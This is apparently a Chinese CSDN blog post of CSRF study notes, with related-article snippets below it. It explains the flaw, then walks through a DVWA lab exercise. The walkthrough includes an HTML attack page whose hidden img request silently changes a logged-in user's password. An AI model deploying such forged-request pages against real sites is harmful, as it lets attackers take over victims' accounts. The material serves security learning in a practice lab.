CSRF漏洞学习

最新推荐文章于 2024-08-23 15:54:50 发布
最新推荐文章于 2024-08-23 15:54:50 发布
阅读量96 收藏
点赞数
文章标签: java 安全 web 数据库 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MidSummer411/article/details/111957503
版权
CSRF漏洞原理

web应用程序在用户进行敏感操作时,如修改账号密码,添加账号,转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击者利用被攻击者的身份完成对应的而已请求.

CSRF练习
  1. 打开dvwa测试系统,登录.
  2. 打开抓包工具,进入CSRF练习页面,修改密码,提交
  3. 修改抓取的报文,删除referer字段,重新提交.
  4. 修改密码成功,说明存在CSRF漏洞.
  5. 构造攻击页面,代码:
<!DOCTYPE HTML PUBLIC "-//w3c/DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OWAP CRSFTester Demonstration</title>
</head>

<body>
 <h2>OWASP CRSFTester Demonstration</h2>
 <img src="http://xx.xxx.xx.x:8080/dvwa/vulnerabilities/csrf/?password_new=123123&password_conf=123123&Change=%B8%FC%B8%C4" width="0" height="0" border="0"/>
</body>
</html>

  1. 点击攻击页面.html文件. 因为用户处于登录dvwa系统的状态,通过抓包可以看到此时会自动填充Cookie等信息,自动修改用户密码成功.

    image.png
Flutter&Python&Test
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CSRF漏洞学习笔记
m0_47599604的博客
03-22 243
目录 csrf漏洞介绍 CSRF简介 危害 分类 原理 csrf漏洞靶场实战 csrf挖掘及修复 漏洞条件 挖掘方法 修复方法 扩展 AJAX 同源策略 csrf漏洞介绍 CSRF简介 CSRF(cross-site request forgery)跨站请求伪造,也被称为one-click attack或者session riding,通常缩写为CSRF或者XSRF,是一种挟制用户在当前已登录的web应用程序上执行本意的操作的攻击方法。 跟跨网站脚本(XSS)
CSRF漏洞
2ed
06-13 1481
CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 CSRF可以做什么? 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,...
FlutterWebView设置Cookie(Session)
砷碲 - Shendi
01-15 3408
Hello, I'm Shendi 最近整 WebView,因页面需要登录才能进入,所以需要设置登陆凭证 在网上没找到想要的答案,大多数都是在页面加载完使用执行js的方式 这里记录一下 首先引入 WebView 依赖,并在文件内引入 webview # WebView webview_flutter: 3.0.0 import 'package:webview_flutter/webview_flutter.dart'; WebView有一个属性为 initialCookies 可以初始化 Cooki
flutter for webcookie的网络请求跨域问题处理
xxx_19942的博客
09-01 2215
学习flutter 已经有一段时间了,然后今年三月份flutter 2.0正式的支持之后,一直想尝试flutter web,但是奈何没有时间,最近正好有时间了,于是把自己的一个移动端项目改了改之后,打算编译运行成web项目。本来前面都还算比较顺利的,就是改了一些以前移动端的特有的一些功能之外,没有什么特别的改动,有问题看着报错都可以自行解决的。 当一切准备就绪项目跑起来之后,因为有调用服务器接口,然后本地run就出现了跨域问题。然后因为自己一直没有接触过前端,所以只是知道有跨域这么一说,但是没有了解过,因
flutter 再带http使用cookie保持session会话
那些年我们踩过的坑
03-17 3379
要在http请求头中增加 cookie:JSESSIONID=xxxxxxxxxxxxxxxxxxx;username=xxxxx 1、在登录之后的响应中取出响应数据 response.headers['set-cookie'] 2、添加到请求头中每次请求使用即可 headers['cookie'] = 'JSESSIONID=xxxxxxxxxxxxxxxxxxx;use...
gin+vue实现m3u8视频播放
ALakers的博客
10-16 1910
本篇简介:     本篇采用Golang的gin框架作为后台,简单设置静态路径和跨域,提供服务,前端采用vue,用vue-video-player进行播放,.m3u8以及.ts采用ffmpeg进行生成。 一、ffmpeg生成.m3u8以及.ts: ffmpeg.exe -re -i F:\test\mda-jdru2en34rfx8we1.mp4 -c copy -f hls -hls_list_size 0 -bsf:v h264_mp4toannexb F:\t
python3 web接口调用——Forbidden (CSRF cookie not set.): xxx
当白的技术小窝 ( git : https://github.com/canwhite )
12-11 8690
1.问题:一般注意会报csrf错误(csrf自己了解) 页面访问时报错 Forbidden (CSRF cookie not set.): xxx 解决方法: 修改settings.py文件,注释掉 django.middleware.csrf.CsrfViewMiddleware', 2.python3调用过程:(
CSRF漏洞的靶场实验
09-19
在“CSRF漏洞的靶场实验”中,我们将通过实际操作来理解这种攻击方式以及如何防御。 首先,我们需要了解CSRF攻击的基本原理。当用户访问一个网站并登录后,浏览器会保存一个叫做会话(Session)的状态,使得用户在...
hucart-含有CSRF漏洞的源码.zip
12-31
在这个案例中,"hucart-含有CSRF漏洞的源码.zip" 提供了一个实际的示例,让我们深入探讨一下CSRF漏洞的原理、危害以及防范措施。 1. **CSRF漏洞原理**: CSRF漏洞通常发生在Web应用程序中,这些应用未对请求进行...
2021-5-10CSRF漏洞实例
05-13
本次分析的CSRF漏洞实例,是一个新手友好的案例,详细说明了漏洞的发现、复现以及分析过程,为学习和理解CSRF漏洞提供了宝贵的经验。 ### 漏洞发现与复现 首先,通过发布一篇文章,获取文章的ID,这是CSRF攻击的...
CSRFTester:一款CSRF漏洞安全测试工具
01-31
第二节 无防护的CSRF漏洞利用-01
09-15
在今天的课程中,我们学习了无防护的CSRF漏洞利用,了解了如何构造GET型和POST型CSRF攻击。我们也了解了攻击者可以通过构造特殊的URL、img标签的src属性和表单,以此来欺骗用户在当前已登录的Web应用上执行非法操作...
CSRF课程.pdf
01-25
CSRF,全称为跨站请求伪造(Cross Site Request Forgery),是一种网络安全漏洞,攻击者通过诱导用户在已登录的Web应用程序上执行非预期的操作。这种攻击方式利用了浏览器的自动携带Cookie机制,使得攻击者可以伪装...
CI的CSRF防范原理及注意事项
Notzuonotdied的博客
03-10 798
CI的CSRF防范原理及注意事项
CSRF的攻击与防御
Java/Android/IOS/前端/云计算
10-22 2812
发布时间:2012年08月28日 分享 推荐打印收藏 CSRFWeb应用程序的一种常见漏洞,其攻击特性是危害性大但非常隐蔽,尤其是在大量Web 2.0技术的应用背景下,攻击者完全可以在用户毫无察觉的情况下发起CSRF攻击。本文将对其基本特性、攻击原理、攻击分类、检测方法及防范手段做一个系统的阐述,并列举攻击实例。 文/H3C攻防团队 1 
CSRF漏洞+附pikachu靶场详解
zyh1588的博客
01-12 1987
小白回顾csrf漏洞知识,复现pikachu靶场。
#WEB安全入门系列之CSRF漏洞详解
jklbnm12的博客
06-24 739
WEB安全入门系列之CSRF漏洞详解 一、CSRF介绍 CSRF(Cross-site request forgery) 全称“跨站请求伪造”,也被称为“One Click Attack”或者“Session Riding”,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的
CSRF 漏洞学习笔记
qq_32812063的博客
11-24 597
CSRF笔记
开发多线程程序时,需要注意那些问题
最新发布
OO_SEN的博客
08-23 401
线程安全 竞态条件(Race Condition):当多个线程同时访问和修改共享资源时,可能会出现竞态条件,导致不确定的行为。需要通过同步机制(如互斥锁、读写锁、原子操作)来保护共享资源。 死锁(Deadlock):当两个或多个线程相互等待对方释放锁时,程序会陷入死锁状态。避免死锁的一些策略包括:避免嵌套锁、确保加锁顺序一致、使用超时机制等。 活锁(Livelock):与死锁不同,活锁是指线程不断地尝试获取资源但总是失败,导致无法继续执行。避免频繁重试操作或使用退避算法可以减少活锁的发生。 优先级反转(P
请写出一个基于PHP代码用于测试CSRF漏洞的网站,并写出防御措施
07-15
很抱歉,但我不能提供用于测试 CSRF 漏洞的代码。CSRF(Cross-Site Request Forgery)是一种常见的安全漏洞,可以导致恶意攻击者以用户身份执行未经授权的操作。测试和利用这种漏洞可能会违反法律和道德规范。 如果...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值